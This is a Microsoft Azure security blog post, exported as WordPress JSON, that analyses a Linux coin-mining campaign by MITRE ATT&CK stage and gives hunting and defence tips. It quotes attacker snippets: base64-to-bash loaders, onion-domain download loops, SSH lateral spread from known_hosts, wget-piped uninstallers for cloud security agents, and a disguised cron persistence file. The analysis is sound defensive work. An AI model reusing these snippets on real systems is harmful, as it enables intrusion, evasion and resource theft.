{"id":805,"date":"2020-01-14T00:00:00","date_gmt":"2020-01-14T00:00:00","guid":{"rendered":"https:\/\/azure.microsoft.com\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux"},"modified":"2025-06-29T10:54:08","modified_gmt":"2025-06-29T17:54:08","slug":"learning-from-cryptocurrency-mining-attack-scripts-on-linux","status":"publish","type":"post","link":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/","title":{"rendered":"Learning from cryptocurrency mining attack scripts on Linux"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers. <a href=\"https:\/\/azure.microsoft.com\/en-us\/blog\/leverage-azure-security-center-to-detect-when-compromised-linux-machines-attack\/\">In the past<\/a>, we&#8217;ve talked about how some attackers use brute force techniques to guess account names and passwords and use those to gain access to machines. Today, we&#8217;re talking about an attack that a few of our customers have seen where a service is exploited to run the attackers code directly on the machine hosting the service.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This attack is interesting for several reasons. The attacker echoes in their scripts so we can see what they want to do, not just what executes on the machine. The scripts cover a wide range of possible services to exploit so they demonstrate how far the campaign can reach. Finally, because we have the scripts themselves, we can pull out good examples from the Lateral Movement, Defense Evasion, Persistence, and Objectives sections of the <a href=\"https:\/\/attack.mitre.org\/matrices\/enterprise\/linux\/\" target=\"_blank\" rel=\"noopener\">Linux MITRE ATT&amp;CK Matrix<\/a> and use those to talk about hunting on your own data.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"initial-vector\">Initial vector<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">For this attack, the first indication something is wrong in the audited logs is an echo command piping a base64 encoded command into base64 for decoding then piping into bash. Across our users, this first command has a parent process of an application or service exposed to the internet and the command is run by the user account associated with that process. This indicates the application or service itself was exploited in order to run the commands. While some of these accounts are specific to a customer, we also see common accounts like Ubuntu, Jenkins, and Hadoop being used.&nbsp;<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\n\/bin\/sh -c \"echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYm\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmRvbm\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nUK|base64 -d|bash\"\n<\/pre><\/div>\n\n\n<h2 class=\"wp-block-heading\" id=\"scripts\">Scripts<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">It is worth taking a brief aside to talk about how this attacker uses scripts. In this case, they do nearly everything through base64 encoded scripts. One of the interesting things about those scripts is they start with the same first two lines: redirecting both the standard error and standard output stream to <code>\/dev\/null<\/code> and setting the path variable to locations the attacker knows generally hold the system commands they want to run.&nbsp;<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nexec &>\/dev\/null\n\nexport PATH=$PATH:\/bin:\/sbin:\/usr\/bin:\/usr\/sbin:\/usr\/local\/bin:\/usr\/local\/sbin\n<\/pre><\/div>\n\n\n<p class=\"wp-block-paragraph\">This indicates that when each of them is base64 encoded, the first part of the encoding is the same every time.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYm\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K\n<\/pre><\/div>\n\n\n<p class=\"wp-block-paragraph\">The use of the same command is particularly helpful when trying to tie attacks together across a large set of machines. The scripts themselves are also interesting because we can see what the attacker intended to run. As defenders, it can be very valuable to look at attacker scripts whenever you can so you can see how they are trying to manipulate systems. For instance, this attacker uses a for loop to cycle through different possible domain names. This type of insight gives defenders more data to pivot on during an investigation.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nfor h in onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to\ndo\nif ! ls \/proc\/$(cat \/tmp\/.X11-unix\/01)\/io; then\nx tv.$h\nelse\nbreak\nfi\ndone\n<\/pre><\/div>\n\n\n<p class=\"wp-block-paragraph\">We observed this attacker use over thirty different encoded scripts across a number of customers, but they boiled down to roughly a dozen basic scripts with small differences in executable names or download sites. Within those scripts are some interesting examples that we can tie directly to the MITRE ATT&amp;CK Matrix for Linux.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"lateral-movement\">Lateral Movement<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">While it isn\u2019t the first thing the attacker does, they do use an interesting combination Discovery (<a href=\"https:\/\/attack.mitre.org\/techniques\/T1018\/\">T1018: Remote System Discovery<\/a>) and Lateral Movement (<a href=\"https:\/\/attack.mitre.org\/techniques\/T1021\/\">T1021: Remote Services<\/a>) techniques to infect other hosts. They grep through the files <code>.bash_history, \/etc\/hosts<\/code>, and <code>.ssh\/known_hosts<\/code> looking for IP addresses. They then attempt to pass their initial encoded script into each host using both the root account and the account they compromised on their current host without a password. Note, the <code>xssh<\/code> function appears before the call in the original script.&nbsp;<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nhosts=$(grep -oE \"b([0-9]{1,3}.){3}[0-9]{1,3}b\" ~\/.bash_history \/etc\/hosts ~\/.ssh\/known_hosts |awk -F: {'print $2'}|sort|uniq ;awk {'print $1'} $HOME\/.ssh\/known_hosts|sort|uniq|grep -v =|sort|uniq)\n\nfor h in $hosts;do xssh root $h; xssh $USER $h & done\n\n------\n\nxssh() {\n\nssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ZXhlYyAKZG9uZQo=|base64 -d|bash'\n\n}\n<\/pre><\/div>\n\n\n<p class=\"wp-block-paragraph\">In each case, after the initial foothold is gained, the attacker uses a similar set of Defense Evasion techniques.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"defense-evasion\">Defense Evasion<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Over various scripts, the attacker uses the <a href=\"https:\/\/attack.mitre.org\/techniques\/T1107\/\">T1107: File Deletion<\/a>, <a href=\"https:\/\/attack.mitre.org\/techniques\/T1222\/\">T1222: File and Directory Permissions Modification<\/a>, and <a href=\"https:\/\/attack.mitre.org\/techniques\/T1089\/\">T1089: Disabling Security Tools<\/a> techniques, as well as the obvious by this point, <a href=\"https:\/\/attack.mitre.org\/techniques\/T1064\/\">T1064: Scripting<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In one script they first they make a randomly named file:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nz=.\/$(date|md5sum|cut -f1 -d\" \")\n<\/pre><\/div>\n\n\n<p class=\"wp-block-paragraph\">After they download their executable into that file, they modify the downloaded file for execution, run it, then delete the file from disk:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nchmod +x $z;$z;rm -f\n<\/pre><\/div>\n\n\n<p class=\"wp-block-paragraph\">In another script, the attacker tries to download then run uninstall files for the Alibaba Cloud Security Server Guard and the AliCloud CloudMonitor service (the variable $w is set as a wget command earlier in the script).<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\n$w update.aegis.aliyun.com\/download\/uninstall.sh|bash\n\n$w update.aegis.aliyun.com\/download\/quartz_uninstall.sh|bash\n\n\/usr\/local\/qcloud\/stargate\/admin\/uninstall.sh\n<\/pre><\/div>\n\n\n<h2 class=\"wp-block-heading\" id=\"persistence\">Persistence<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Once the coin miner is up and running, this attacker uses a combination of <a href=\"https:\/\/attack.mitre.org\/techniques\/T1168\/\">T1168: Local Job Scheduling<\/a> and <a href=\"https:\/\/attack.mitre.org\/techniques\/T1501\/\">T1501: Systemd Service<\/a> scheduled tasks for persistence. The below is taken from another part of a script where they echo an ntp call and one of their base64 encoded scripts into the file systemd-ntpdate then add a cron job to run that file. The encoded script here is basically the same as their original script that started off the intrusion.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\necho -e \"#x21\/bin\/bashnexec &>\/dev\/nullnntpdate ntp.aliyun.comnsleep $((RANDOM % 600))necho ZXhlYyAmPi92gKZmkK|base64 -d|bash\" > \/lib\/systemd\/systemd-ntpdate\n\necho \"0 * * * * root \/lib\/systemd\/systemd-ntpdate\" > \/etc\/cron.d\/0systemd-ntpdate\n\ntouch -r \/bin\/grep \/lib\/systemd\/systemd-ntpdate\n\ntouch -r \/bin\/grep \/etc\/cron.d\/0systemd-ntpdate\n\nchmod +x \/lib\/systemd\/systemd-ntpdate\n<\/pre><\/div>\n\n\n<h2 class=\"wp-block-heading\" id=\"objectives\">Objectives<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">As previously mentioned, the main objective of this attacker is to get a coin miner started. They do this in the very first script that is run using the <a href=\"https:\/\/attack.mitre.org\/techniques\/T1496\/\">T1496: Resource Hijacking<\/a> tactic. One of the interesting things about this attack is that while they start by trying to get the coin miner going with the initially compromised account, one of the subsequent scripts attempts to get it started using commands from different pieces of software (<a href=\"https:\/\/attack.mitre.org\/techniques\/T1072\/\">T1072: Third-party Software<\/a>).<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title=\"\">\nansible all -m shell -a 'echo ZXhuZQo=|base64 -d|bash'\n\nknife ssh 'name:*' 'echo ZXhuZQo=|base64 -d|bash'\n\nsalt '*' cmd.run 'echo ZXhZQo=|base64 -d|bash'\n<\/pre><\/div>\n\n\n<h2 class=\"wp-block-heading\" id=\"hunting\">Hunting<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">ASC Linux customers should expect to see <a href=\"https:\/\/azure.microsoft.com\/en-us\/blog\/how-azure-security-center-helps-detect-attacks-against-your-linux-machines\/\">coin mining<\/a> or suspicious download alerts from this type of activity, but what if you wanted to hunt for it yourself? If you use the above script examples, there are several indicators you could follow up on, especially if you have command line logging.&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Do you see unexpected connections to onion and tor sites?<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Do you see unexpected ssh connections between hosts?<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Do you see an increase in activity from a particular user?<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Do you see base64 commands echoed, decoded, then piped into bash? Any one of those could be suspicious depending on your own network.<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Check your cron jobs, do you see wgets or base64 encoded lines there?<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Check the services running on your machines, do you see anything unexpected?<\/li>\n\n\n\n<li class=\"wp-block-list-item\">In reference to the Objectives section above, do you see commands for pieces of software you don\u2019t have installed?<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Azure Sentinel can help with your <a href=\"https:\/\/docs.microsoft.com\/en-us\/azure\/sentinel\/hunting\" target=\"_blank\" rel=\"noopener\">hunting<\/a> as well. If you are an Azure Security Center customer already, we make it easy to <a href=\"https:\/\/techcommunity.microsoft.com\/t5\/azure-sentinel\/integrating-azure-security-center-with-azure-sentinel\/ba-p\/482847\" target=\"_blank\" rel=\"noopener\">integrate<\/a> into Azure Sentinel.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"defense\">Defense<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">In addition to hunting, there are a few things you can do to defend yourself from these types of attacks. If you have internet-facing services, make sure you are keeping them <a href=\"https:\/\/docs.microsoft.com\/en-us\/azure\/automation\/automation-tutorial-update-management\">up to date<\/a>, are changing any default passwords, and taking advantage of some of the other credential management tools Azure offers like <a href=\"https:\/\/docs.microsoft.com\/en-us\/azure\/security-center\/security-center-just-in-time\">just-in-time (JIT)<\/a>, <a href=\"https:\/\/techcommunity.microsoft.com\/t5\/Azure-Active-Directory-Identity\/Announcing-password-less-login-identity-governance-and-more-for\/ba-p\/262472\">password-less sign-in<\/a>, and <a href=\"https:\/\/docs.microsoft.com\/en-us\/azure\/key-vault\/key-vault-whatis\">Azure Key Vault<\/a>. Monitor your Azure machine utilization rates; an unexpected increase in usage could indicate a coin miner. Check out other ideas at the Azure Security Center <a href=\"https:\/\/docs.microsoft.com\/en-us\/azure\/security-center\/\" target=\"_blank\" rel=\"noopener\">documentation page<\/a>.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"identifying-attacks-on-linux-systems\">Identifying attacks on Linux systems<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Coin miners represent a continuing threat to machines exposed to the internet. While it&#8217;s generally easy to block a known-bad IP or use a signature-based antivirus, by studying attacker tactics, techniques, and procedures, defenders can find new and more reliable ways to protect their environments.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">While we talk about a specific coin miner attacker in this post, the basic techniques highlighted above are used by many different types of attackers of Linux systems. We see Lateral movement, Defense Evasion, and Persistence techniques similar to the above used by different attackers regularly and are continually adding new detections based on our investigations.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ms_queue_id":[],"ep_exclude_from_search":false,"_classifai_error":"","_classifai_text_to_speech_error":"","_alt_title":"","footnotes":"","msx_community_cta_settings":[]},"categories":[1466,1459],"tags":[],"audience":[3053,3056],"content-type":[1511],"product":[1798,1478,1561],"tech-community":[],"topic":[],"coauthors":[349],"class_list":["post-805","post","type-post","status-publish","format-standard","hentry","category-hybrid-multicloud","category-security","audience-it-decision-makers","audience-it-implementors","content-type-best-practices","product-azure-security-center","product-key-vault","product-microsoft-sentinel","review-flag-1680286581-295","review-flag-1680286581-56","review-flag-1680286581-364","review-flag-1680286584-658","review-flag-1-1680286581-825","review-flag-2-1680286581-601","review-flag-3-1680286581-173","review-flag-5-1680286581-950","review-flag-9-1680286581-259","review-flag-integ-1680286579-214","review-flag-new-1680286579-546"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Learning from cryptocurrency mining attack scripts on Linux | Microsoft Azure Blog<\/title>\n<meta name=\"description\" content=\"Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Learning from cryptocurrency mining attack scripts on Linux | Microsoft Azure Blog\" \/>\n<meta property=\"og:description\" content=\"Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/\" \/>\n<meta property=\"og:site_name\" content=\"Microsoft Azure Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/microsoftazure\" \/>\n<meta property=\"article:published_time\" content=\"2020-01-14T00:00:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-06-29T17:54:08+00:00\" \/>\n<meta name=\"author\" content=\"Russell McDonald\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@azure\" \/>\n<meta name=\"twitter:site\" content=\"@azure\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Russell McDonald\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/\"},\"author\":[{\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/author\/russell-mcdonald\/\",\"@type\":\"Person\",\"@name\":\"Russell McDonald\"}],\"headline\":\"Learning from cryptocurrency mining attack scripts on Linux\",\"datePublished\":\"2020-01-14T00:00:00+00:00\",\"dateModified\":\"2025-06-29T17:54:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/\"},\"wordCount\":1261,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/#organization\"},\"articleSection\":[\"Hybrid + multicloud\",\"Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/\",\"url\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/\",\"name\":\"Learning from cryptocurrency mining attack scripts on Linux | Microsoft Azure Blog\",\"isPartOf\":{\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/#website\"},\"datePublished\":\"2020-01-14T00:00:00+00:00\",\"dateModified\":\"2025-06-29T17:54:08+00:00\",\"description\":\"Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers.\",\"breadcrumb\":{\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog home\",\"item\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Hybrid + multicloud\",\"item\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/category\/hybrid-multicloud\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Learning from cryptocurrency mining attack scripts on Linux\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/#website\",\"url\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/\",\"name\":\"Microsoft Azure Blog\",\"description\":\"Get the latest Azure news, updates, and announcements from the Azure blog. From product updates to hot topics, hear from the Azure experts.\",\"publisher\":{\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/#organization\",\"name\":\"Microsoft Azure Blog\",\"url\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-content\/uploads\/2024\/06\/microsoft_logo.webp\",\"contentUrl\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-content\/uploads\/2024\/06\/microsoft_logo.webp\",\"width\":512,\"height\":512,\"caption\":\"Microsoft Azure Blog\"},\"image\":{\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/microsoftazure\",\"https:\/\/x.com\/azure\",\"https:\/\/www.instagram.com\/microsoftdeveloper\/\",\"https:\/\/www.linkedin.com\/company\/16188386\",\"https:\/\/www.youtube.com\/user\/windowsazure\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/#\/schema\/person\/c702e5edd662b328b49b7e1180cab117\",\"name\":\"shakir\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/9342c7c05bb16548741bc5cd3a3e3b7ee0c8e746844ad2cc582db5beb5514c6f?s=96&d=mm&r=g7664e653ea371ce16eaf75e9fa8952c4\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9342c7c05bb16548741bc5cd3a3e3b7ee0c8e746844ad2cc582db5beb5514c6f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9342c7c05bb16548741bc5cd3a3e3b7ee0c8e746844ad2cc582db5beb5514c6f?s=96&d=mm&r=g\",\"caption\":\"shakir\"},\"sameAs\":[\"https:\/\/azure.microsoft.com\"],\"url\":\"https:\/\/azure.microsoft.com\/en-us\/blog\/author\/shakir\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Learning from cryptocurrency mining attack scripts on Linux | Microsoft Azure Blog","description":"Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/","og_locale":"en_US","og_type":"article","og_title":"Learning from cryptocurrency mining attack scripts on Linux | Microsoft Azure Blog","og_description":"Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers.","og_url":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/","og_site_name":"Microsoft Azure Blog","article_publisher":"https:\/\/www.facebook.com\/microsoftazure","article_published_time":"2020-01-14T00:00:00+00:00","article_modified_time":"2025-06-29T17:54:08+00:00","author":"Russell McDonald","twitter_card":"summary_large_image","twitter_creator":"@azure","twitter_site":"@azure","twitter_misc":{"Written by":"Russell McDonald","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/#article","isPartOf":{"@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/"},"author":[{"@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/author\/russell-mcdonald\/","@type":"Person","@name":"Russell McDonald"}],"headline":"Learning from cryptocurrency mining attack scripts on Linux","datePublished":"2020-01-14T00:00:00+00:00","dateModified":"2025-06-29T17:54:08+00:00","mainEntityOfPage":{"@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/"},"wordCount":1261,"commentCount":0,"publisher":{"@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/#organization"},"articleSection":["Hybrid + multicloud","Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/","url":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/","name":"Learning from cryptocurrency mining attack scripts on Linux | Microsoft Azure Blog","isPartOf":{"@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/#website"},"datePublished":"2020-01-14T00:00:00+00:00","dateModified":"2025-06-29T17:54:08+00:00","description":"Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers.","breadcrumb":{"@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/learning-from-cryptocurrency-mining-attack-scripts-on-linux\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog home","item":"https:\/\/azure.microsoft.com\/en-us\/blog\/"},{"@type":"ListItem","position":2,"name":"Hybrid + multicloud","item":"https:\/\/azure.microsoft.com\/en-us\/blog\/category\/hybrid-multicloud\/"},{"@type":"ListItem","position":3,"name":"Learning from cryptocurrency mining attack scripts on Linux"}]},{"@type":"WebSite","@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/#website","url":"https:\/\/azure.microsoft.com\/en-us\/blog\/","name":"Microsoft Azure Blog","description":"Get the latest Azure news, updates, and announcements from the Azure blog. From product updates to hot topics, hear from the Azure experts.","publisher":{"@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/azure.microsoft.com\/en-us\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/#organization","name":"Microsoft Azure Blog","url":"https:\/\/azure.microsoft.com\/en-us\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-content\/uploads\/2024\/06\/microsoft_logo.webp","contentUrl":"https:\/\/azure.microsoft.com\/en-us\/blog\/wp-content\/uploads\/2024\/06\/microsoft_logo.webp","width":512,"height":512,"caption":"Microsoft Azure Blog"},"image":{"@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/microsoftazure","https:\/\/x.com\/azure","https:\/\/www.instagram.com\/microsoftdeveloper\/","https:\/\/www.linkedin.com\/company\/16188386","https:\/\/www.youtube.com\/user\/windowsazure"]},{"@type":"Person","@id":"https:\/\/azure.microsoft.com\/en-us\/blog\/#\/schema\/person\/c702e5edd662b328b49b7e1180cab117","name":"shakir","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/9342c7c05bb16548741bc5cd3a3e3b7ee0c8e746844ad2cc582db5beb5514c6f?s=96&d=mm&r=g7664e653ea371ce16eaf75e9fa8952c4","url":"https:\/\/secure.gravatar.com\/avatar\/9342c7c05bb16548741bc5cd3a3e3b7ee0c8e746844ad2cc582db5beb5514c6f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9342c7c05bb16548741bc5cd3a3e3b7ee0c8e746844ad2cc582db5beb5514c6f?s=96&d=mm&r=g","caption":"shakir"},"sameAs":["https:\/\/azure.microsoft.com"],"url":"https:\/\/azure.microsoft.com\/en-us\/blog\/author\/shakir\/"}]}},"msxcm_display_generated_audio":false,"msxcm_animated_featured_image":